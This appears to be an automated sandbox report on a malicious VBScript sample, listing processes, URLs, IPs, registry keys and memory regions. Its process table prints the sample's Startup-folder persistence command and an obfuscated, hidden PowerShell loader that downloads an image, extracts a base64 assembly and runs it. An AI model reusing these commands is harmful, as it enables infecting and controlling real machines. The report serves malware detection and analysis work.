Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Logistics1.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zhdkvmj.trw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b44hbydq.r5a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4njhxmt.mxe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwendzpd.511.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2tv5igq.3qj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzmg0ah5.b2y.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName +
''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient
= '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+'
= {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex
= '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length
= {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+'
= [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod
= [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0},
{0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
|
|
|
|
C:\Windows\SysWOW64\appidtel.exe
|
"C:\Windows\SysWOW64\appidtel.exe"
|
|
|
|
C:\Windows\SysWOW64\appidtel.exe
|
"C:\Windows\SysWOW64\appidtel.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
|
207.241.227.242
|
|
|
|
https://ia600102.us.archive.org
|
unknown
|
|
|
|
https://ia600102.us.archive.org/32/items/detah-note-v_
|
unknown
|
|
|
|
https://paste.ee/d/A2fG2/0
|
188.114.96.3
|
|
|
|
https://ia600102.us.archive.org/32/it
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://i0002.us
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://ia600102.us.arX
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ia600102.us.archive.org
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600102.us.archive.org
|
207.241.227.242
|
|
|
|
paste.ee
|
188.114.96.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
207.241.227.242
|
ia600102.us.archive.org
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
32F0000
|
direct allocation
|
page read and write
|
|
|
|
21AE7E31000
|
trusted library allocation
|
page read and write
|
||
|
21AFE770000
|
heap
|
page read and write
|
||
|
21AE4904000
|
heap
|
page read and write
|
||
|
21AE6160000
|
heap
|
page readonly
|
||
|
2024D6C6000
|
heap
|
page read and write
|
||
|
28E7A033000
|
heap
|
page read and write
|
||
|
28E79FDA000
|
heap
|
page read and write
|
||
|
19C71F0F000
|
heap
|
page read and write
|
||
|
20265C1D000
|
heap
|
page read and write
|
||
|
7FFB4A234000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1E0000
|
trusted library allocation
|
page read and write
|
||
|
21AFE843000
|
heap
|
page read and write
|
||
|
7FFB49ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
34F9000
|
direct allocation
|
page execute and read and write
|
||
|
21AE80BC000
|
trusted library allocation
|
page read and write
|
||
|
19C59A80000
|
heap
|
page execute and read and write
|
||
|
372C2FE000
|
stack
|
page read and write
|
||
|
21AF856A000
|
trusted library allocation
|
page read and write
|
||
|
28E78470000
|
heap
|
page read and write
|
||
|
372C37E000
|
stack
|
page read and write
|
||
|
19C71FD0000
|
heap
|
page read and write
|
||
|
21AE4985000
|
heap
|
page read and write
|
||
|
19C5A4D4000
|
trusted library allocation
|
page read and write
|
||
|
28E79FFA000
|
heap
|
page read and write
|
||
|
21AFE9E4000
|
heap
|
page read and write
|
||
|
7FFB4A150000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A190000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49F7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C72370000
|
heap
|
page read and write
|
||
|
6C0C0BF000
|
stack
|
page read and write
|
||
|
28E787CA000
|
heap
|
page read and write
|
||
|
21AE7B09000
|
trusted library allocation
|
page read and write
|
||
|
21AE6B41000
|
trusted library allocation
|
page read and write
|
||
|
28E7A03F000
|
heap
|
page read and write
|
||
|
19C57EC9000
|
heap
|
page read and write
|
||
|
21AE7E43000
|
trusted library allocation
|
page read and write
|
||
|
2024D600000
|
heap
|
page read and write
|
||
|
28E7A02B000
|
heap
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
21AE6500000
|
trusted library allocation
|
page read and write
|
||
|
2E79000
|
heap
|
page read and write
|
||
|
2B3287C000
|
stack
|
page read and write
|
||
|
28E7A00E000
|
heap
|
page read and write
|
||
|
2024DF66000
|
trusted library allocation
|
page read and write
|
||
|
21AE7747000
|
trusted library allocation
|
page read and write
|
||
|
21AE6170000
|
trusted library allocation
|
page read and write
|
||
|
6C0C33E000
|
stack
|
page read and write
|
||
|
21AE4884000
|
heap
|
page read and write
|
||
|
7FFB49F60000
|
trusted library allocation
|
page read and write
|
||
|
2B328FF000
|
stack
|
page read and write
|
||
|
7FFB49F7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
21AF692A000
|
trusted library allocation
|
page read and write
|
||
|
372C27E000
|
stack
|
page read and write
|
||
|
7FFB4A130000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A200000
|
trusted library allocation
|
page read and write
|
||
|
28E784FF000
|
heap
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
2024BC60000
|
trusted library allocation
|
page read and write
|
||
|
28E784C7000
|
heap
|
page read and write
|
||
|
19C5A392000
|
trusted library allocation
|
page read and write
|
||
|
28E7A50C000
|
heap
|
page read and write
|
||
|
28E7A012000
|
heap
|
page read and write
|
||
|
2024BD88000
|
heap
|
page read and write
|
||
|
21AE6CE3000
|
trusted library allocation
|
page read and write
|
||
|
2024D6C0000
|
heap
|
page read and write
|
||
|
2E7A000
|
heap
|
page read and write
|
||
|
7FFB4A090000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C71E7D000
|
heap
|
page read and write
|
||
|
7FFB4A07A000
|
trusted library allocation
|
page read and write
|
||
|
2B3297E000
|
stack
|
page read and write
|
||
|
7FFB4A100000
|
trusted library allocation
|
page read and write
|
||
|
28E787C8000
|
heap
|
page read and write
|
||
|
7FFB4A071000
|
trusted library allocation
|
page read and write
|
||
|
2B32DBF000
|
stack
|
page read and write
|
||
|
3712000
|
direct allocation
|
page execute and read and write
|
||
|
21AE49A7000
|
heap
|
page read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
2025DBD0000
|
trusted library allocation
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
28E79FA2000
|
heap
|
page read and write
|
||
|
28E7A581000
|
heap
|
page read and write
|
||
|
372C7BC000
|
stack
|
page read and write
|
||
|
21AE48D3000
|
heap
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
7FFB4A1D0000
|
trusted library allocation
|
page read and write
|
||
|
19C57E10000
|
heap
|
page read and write
|
||
|
19C5A1AE000
|
trusted library allocation
|
page read and write
|
||
|
21AF6751000
|
trusted library allocation
|
page read and write
|
||
|
21AE6D0B000
|
trusted library allocation
|
page read and write
|
||
|
21AE61B6000
|
heap
|
page read and write
|
||
|
28E784C6000
|
heap
|
page read and write
|
||
|
7FFB4A264000
|
trusted library allocation
|
page read and write
|
||
|
381F000
|
stack
|
page read and write
|
||
|
2024BD86000
|
heap
|
page read and write
|
||
|
7FFB4A0F0000
|
trusted library allocation
|
page read and write
|
||
|
2024BC80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A060000
|
trusted library allocation
|
page read and write
|
||
|
19C5A6CC000
|
trusted library allocation
|
page read and write
|
||
|
2BEC000
|
stack
|
page read and write
|
||
|
3990000
|
heap
|
page read and write
|
||
|
2024BD14000
|
heap
|
page read and write
|
||
|
21AE48B0000
|
trusted library allocation
|
page read and write
|
||
|
319C000
|
heap
|
page read and write
|
||
|
21AE4840000
|
heap
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
2B326FE000
|
stack
|
page read and write
|
||
|
7FFB49F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C58090000
|
heap
|
page readonly
|
||
|
7FFB4A200000
|
trusted library allocation
|
page read and write
|
||
|
19C58060000
|
trusted library allocation
|
page read and write
|
||
|
21AF6F46000
|
trusted library allocation
|
page read and write
|
||
|
21AE6720000
|
heap
|
page execute and read and write
|
||
|
7FFB4A1A0000
|
trusted library allocation
|
page read and write
|
||
|
28E7A130000
|
heap
|
page read and write
|
||
|
2024DB7A000
|
trusted library allocation
|
page read and write
|
||
|
28E7A034000
|
heap
|
page read and write
|
||
|
28E7853C000
|
heap
|
page read and write
|
||
|
372C8BE000
|
stack
|
page read and write
|
||
|
7FFB4A1C0000
|
trusted library allocation
|
page read and write
|
||
|
28E7A4CB000
|
heap
|
page read and write
|
||
|
20265C3C000
|
heap
|
page read and write
|
||
|
372D38E000
|
stack
|
page read and write
|
||
|
28E784BA000
|
heap
|
page read and write
|
||
|
19C59F51000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0C0000
|
trusted library allocation
|
page read and write
|
||
|
19C57EDD000
|
heap
|
page read and write
|
||
|
28E7A036000
|
heap
|
page read and write
|
||
|
28E784BB000
|
heap
|
page read and write
|
||
|
28E78543000
|
heap
|
page read and write
|
||
|
28E787CE000
|
heap
|
page read and write
|
||
|
7FFB4A140000
|
trusted library allocation
|
page read and write
|
||
|
6C0BDFE000
|
stack
|
page read and write
|
||
|
372C6B7000
|
stack
|
page read and write
|
||
|
6C0C13E000
|
stack
|
page read and write
|
||
|
7FFB49F66000
|
trusted library allocation
|
page read and write
|
||
|
19C57EBD000
|
heap
|
page read and write
|
||
|
19C69EB1000
|
trusted library allocation
|
page read and write
|
||
|
19C59E8A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EDC000
|
trusted library allocation
|
page read and write
|
||
|
2024DCAC000
|
trusted library allocation
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
334E000
|
heap
|
page read and write
|
||
|
28E79FD1000
|
heap
|
page read and write
|
||
|
20265B60000
|
heap
|
page read and write
|
||
|
7FFB4A0B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3071000
|
heap
|
page read and write
|
||
|
28E78553000
|
heap
|
page read and write
|
||
|
2B32BB9000
|
stack
|
page read and write
|
||
|
28E79FEA000
|
heap
|
page read and write
|
||
|
2024DF1C000
|
trusted library allocation
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
21AE833C000
|
trusted library allocation
|
page read and write
|
||
|
6C0C3BE000
|
stack
|
page read and write
|
||
|
28E79FB6000
|
heap
|
page read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
E3206F6000
|
stack
|
page read and write
|
||
|
21AE48FE000
|
heap
|
page read and write
|
||
|
2024BC55000
|
heap
|
page read and write
|
||
|
7FFB4A1B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A080000
|
trusted library allocation
|
page execute and read and write
|
||
|
21AE6B3C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A080000
|
trusted library allocation
|
page execute and read and write
|
||
|
3071000
|
heap
|
page read and write
|
||
|
19C57E50000
|
heap
|
page read and write
|
||
|
21AE48C9000
|
heap
|
page read and write
|
||
|
19C720C0000
|
heap
|
page read and write
|
||
|
7FFB49EC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B32EBC000
|
stack
|
page read and write
|
||
|
2024BAD0000
|
heap
|
page read and write
|
||
|
19C57EC3000
|
heap
|
page read and write
|
||
|
19C71E9F000
|
heap
|
page read and write
|
||
|
7FFB4A220000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EC0000
|
trusted library allocation
|
page read and write
|
||
|
19C59A60000
|
heap
|
page execute and read and write
|
||
|
19C5A3F5000
|
trusted library allocation
|
page read and write
|
||
|
2B32673000
|
stack
|
page read and write
|
||
|
20266180000
|
heap
|
page read and write
|
||
|
19C57EBF000
|
heap
|
page read and write
|
||
|
7FFB49EE0000
|
trusted library allocation
|
page read and write
|
||
|
21AFE757000
|
heap
|
page read and write
|
||
|
7FFB4A0B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21AE6B49000
|
trusted library allocation
|
page read and write
|
||
|
2BAD000
|
stack
|
page read and write
|
||
|
7FFB49EC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E7A031000
|
heap
|
page read and write
|
||
|
2024E031000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1D0000
|
trusted library allocation
|
page read and write
|
||
|
2024BC90000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
28E79FB1000
|
heap
|
page read and write
|
||
|
2B32E3E000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
19C58157000
|
heap
|
page execute and read and write
|
||
|
2024BCDE000
|
heap
|
page read and write
|
||
|
2024E09D000
|
trusted library allocation
|
page read and write
|
||
|
7DF4BC4F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A210000
|
trusted library allocation
|
page read and write
|
||
|
19C71EEF000
|
heap
|
page read and write
|
||
|
28E7A034000
|
heap
|
page read and write
|
||
|
28E787CA000
|
heap
|
page read and write
|
||
|
20265BB5000
|
heap
|
page read and write
|
||
|
28E7A4F9000
|
heap
|
page read and write
|
||
|
2024DECF000
|
trusted library allocation
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
7FFB4A1A0000
|
trusted library allocation
|
page read and write
|
||
|
21AE8406000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A190000
|
trusted library allocation
|
page read and write
|
||
|
2024BD63000
|
heap
|
page read and write
|
||
|
28E787C5000
|
heap
|
page read and write
|
||
|
19C59F4E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A130000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A061000
|
trusted library allocation
|
page read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
21AF67C1000
|
trusted library allocation
|
page read and write
|
||
|
28E787CA000
|
heap
|
page read and write
|
||
|
7FFB4A0A2000
|
trusted library allocation
|
page read and write
|
||
|
6C0BFFE000
|
stack
|
page read and write
|
||
|
28E79FAA000
|
heap
|
page read and write
|
||
|
34FD000
|
direct allocation
|
page execute and read and write
|
||
|
28E7A01A000
|
heap
|
page read and write
|
||
|
7FFB49F6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E7A036000
|
heap
|
page read and write
|
||
|
7FFB4A190000
|
trusted library allocation
|
page read and write
|
||
|
2024D5B0000
|
trusted library allocation
|
page read and write
|
||
|
356E000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4A0A2000
|
trusted library allocation
|
page read and write
|
||
|
19C71EF5000
|
heap
|
page read and write
|
||
|
19C58110000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EC2000
|
trusted library allocation
|
page read and write
|
||
|
21AE6596000
|
heap
|
page read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
28E7A502000
|
heap
|
page read and write
|
||
|
372D40E000
|
stack
|
page read and write
|
||
|
21AF6A4A000
|
trusted library allocation
|
page read and write
|
||
|
2024E17A000
|
trusted library allocation
|
page read and write
|
||
|
19C58080000
|
trusted library allocation
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
19C59EA9000
|
trusted library allocation
|
page read and write
|
||
|
28E79FC9000
|
heap
|
page read and write
|
||
|
20265C19000
|
heap
|
page read and write
|
||
|
20265C27000
|
heap
|
page read and write
|
||
|
2024BCCE000
|
heap
|
page read and write
|
||
|
20265C80000
|
heap
|
page execute and read and write
|
||
|
2B32A77000
|
stack
|
page read and write
|
||
|
2024BCD6000
|
heap
|
page read and write
|
||
|
19C5A2E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49FA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A1A0000
|
trusted library allocation
|
page read and write
|
||
|
21AE490A000
|
heap
|
page read and write
|
||
|
2B32D3E000
|
stack
|
page read and write
|
||
|
21AF6A3B000
|
trusted library allocation
|
page read and write
|
||
|
28E79FCE000
|
heap
|
page read and write
|
||
|
21AFE8E0000
|
heap
|
page read and write
|
||
|
19C71F28000
|
heap
|
page read and write
|
||
|
21AE7E19000
|
trusted library allocation
|
page read and write
|
||
|
21AE7E3F000
|
trusted library allocation
|
page read and write
|
||
|
372C83E000
|
stack
|
page read and write
|
||
|
28E79FBE000
|
heap
|
page read and write
|
||
|
2024BC10000
|
heap
|
page read and write
|
||
|
20265BBB000
|
heap
|
page read and write
|
||
|
7FFB4A1F0000
|
trusted library allocation
|
page read and write
|
||
|
6C0C43C000
|
stack
|
page read and write
|
||
|
20265C52000
|
heap
|
page read and write
|
||
|
7FFB49EB4000
|
trusted library allocation
|
page read and write
|
||
|
21AE6CFD000
|
trusted library allocation
|
page read and write
|
||
|
19C581A5000
|
heap
|
page read and write
|
||
|
28E79FA0000
|
heap
|
page read and write
|
||
|
28E7A009000
|
heap
|
page read and write
|
||
|
2025DB61000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C57DE0000
|
heap
|
page read and write
|
||
|
19C71E6F000
|
heap
|
page read and write
|
||
|
2024DB83000
|
trusted library allocation
|
page read and write
|
||
|
28E7A00F000
|
heap
|
page read and write
|
||
|
19C71E9D000
|
heap
|
page read and write
|
||
|
E320CFE000
|
stack
|
page read and write
|
||
|
21AE61BA000
|
heap
|
page read and write
|
||
|
21AFEA40000
|
heap
|
page read and write
|
||
|
21AE4880000
|
heap
|
page read and write
|
||
|
19C581A0000
|
heap
|
page read and write
|
||
|
19C71F2D000
|
heap
|
page read and write
|
||
|
7FFB4A120000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1E0000
|
trusted library allocation
|
page read and write
|
||
|
21AE7D81000
|
trusted library allocation
|
page read and write
|
||
|
19C59F54000
|
trusted library allocation
|
page read and write
|
||
|
E320AFF000
|
stack
|
page read and write
|
||
|
20265C42000
|
heap
|
page read and write
|
||
|
21AE4946000
|
heap
|
page read and write
|
||
|
6C0BE7D000
|
stack
|
page read and write
|
||
|
7FFB4A050000
|
trusted library allocation
|
page read and write
|
||
|
28E7A046000
|
heap
|
page read and write
|
||
|
19C71F17000
|
heap
|
page read and write
|
||
|
21AFE805000
|
heap
|
page read and write
|
||
|
19C69E50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A25C000
|
trusted library allocation
|
page read and write
|
||
|
28E7A481000
|
heap
|
page read and write
|
||
|
2024BBB0000
|
heap
|
page read and write
|
||
|
2024BCEE000
|
heap
|
page read and write
|
||
|
372C738000
|
stack
|
page read and write
|
||
|
21AE4700000
|
heap
|
page read and write
|
||
|
28E79FC6000
|
heap
|
page read and write
|
||
|
21AE8035000
|
trusted library allocation
|
page read and write
|
||
|
28E7A017000
|
heap
|
page read and write
|
||
|
7FFB4A092000
|
trusted library allocation
|
page read and write
|
||
|
2B32ABE000
|
stack
|
page read and write
|
||
|
21AE6740000
|
heap
|
page execute and read and write
|
||
|
7FFB49EC4000
|
trusted library allocation
|
page read and write
|
||
|
19C69E41000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A062000
|
trusted library allocation
|
page read and write
|
||
|
21AE67D1000
|
trusted library allocation
|
page read and write
|
||
|
21AE491E000
|
heap
|
page read and write
|
||
|
2B32C3B000
|
stack
|
page read and write
|
||
|
7FFB4A160000
|
trusted library allocation
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
21AE4890000
|
trusted library allocation
|
page read and write
|
||
|
6C0BF7E000
|
stack
|
